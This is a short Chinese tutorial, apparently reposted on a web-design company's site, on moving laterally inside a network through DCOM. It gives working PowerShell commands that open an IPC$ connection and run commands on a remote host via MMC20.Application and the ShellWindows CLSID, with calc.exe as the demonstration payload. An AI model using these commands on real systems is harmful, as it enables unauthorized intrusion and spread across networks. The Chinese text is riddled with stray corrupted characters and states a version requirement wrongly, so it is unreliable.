本篇內(nèi)容主要講解“怎么使用dcom在內(nèi)網(wǎng)中進行橫向移動”，感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷，實用性強。下面就讓小編來帶大家學(xué)習(xí)“怎么使用dcom在內(nèi)網(wǎng)中進行橫向移動”吧!

創(chuàng)新互聯(lián)建站是由多位在大型網(wǎng)絡(luò)公司、廣告設(shè)計公司的優(yōu)秀設(shè)計人員和策劃人員組成的一個具有豐富經(jīng)驗的團隊，其中包括網(wǎng)站策劃、網(wǎng)頁美工、網(wǎng)站程序員、網(wǎng)頁設(shè)計師、平面廣告設(shè)計師、網(wǎng)絡(luò)營銷人員及形象策劃。承接：成都網(wǎng)站建設(shè)、成都做網(wǎng)站、網(wǎng)站改版、網(wǎng)頁設(shè)計制作、網(wǎng)站建設(shè)與維護、網(wǎng)絡(luò)推廣、數(shù)據(jù)庫開發(fā),以高性價比制作企業(yè)網(wǎng)站、行業(yè)門戶平臺等全方位的服務(wù)。

Dcom是微軟的一系列概念和程序接口，通過dcom，客戶端程序?qū)ο竽軌蛳蚓W(wǎng)絡(luò)中的另一臺計算機上的服務(wù)器程序?qū)ο蟀l(fā)起請求，今天講講如何通過dcom進行橫向移動。

首先調(diào)用powershell

通過使用指令Get-CimInstance Win32_DCOMApplication來查看獲取本地DCOM程序列表

由于Get-CimInstance這個cmdlet只存在于powershell的3.0版本中，所以執(zhí)行該指令需要2020以上版本的操作系統(tǒng)才可以執(zhí)行，當(dāng)然，如果沒有3.0版本也可以通過執(zhí)行Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication來獲取，兩者效果是相同的。

1. 使用DCOM執(zhí)行任意命令，適用于本地

1> $com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.101.102"))

2> $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","minimized")

通過執(zhí)行以上命令，會以當(dāng)前會話執(zhí)行Administrator權(quán)限的calc.exe

2. 在遠程主機中執(zhí)行命令

首先通過net use \\IP "password" /user:域\dm 建立ipc$連接

然后執(zhí)行以下命令:

$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","目標IP"))

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","")

即可在遠程計算機中執(zhí)行calc.exe

3. 第二種方法

在遠程主機中調(diào)用powershell，輸入命令:

$com=[Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.101.102")

$obj = [System.Activator]::CreateInstance($com)

$item = $obj.item()

$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

執(zhí)行calc.exe程序

到此，相信大家對“怎么使用dcom在內(nèi)網(wǎng)中進行橫向移動”有了更深的了解，不妨來實際操作一番吧！這里是創(chuàng)新互聯(lián)網(wǎng)站，更多相關(guān)內(nèi)容可以進入相關(guān)頻道進行查詢，關(guān)注我們，繼續(xù)學(xué)習(xí)！

新聞名稱：怎么使用dcom在內(nèi)網(wǎng)中進行橫向移動
鏈接地址：http://aaarwkj.com/article0/jeeeio.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供服務(wù)器托管、網(wǎng)站建設(shè)、營銷型網(wǎng)站建設(shè)、響應(yīng)式網(wǎng)站、定制網(wǎng)站、關(guān)鍵詞優(yōu)化

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)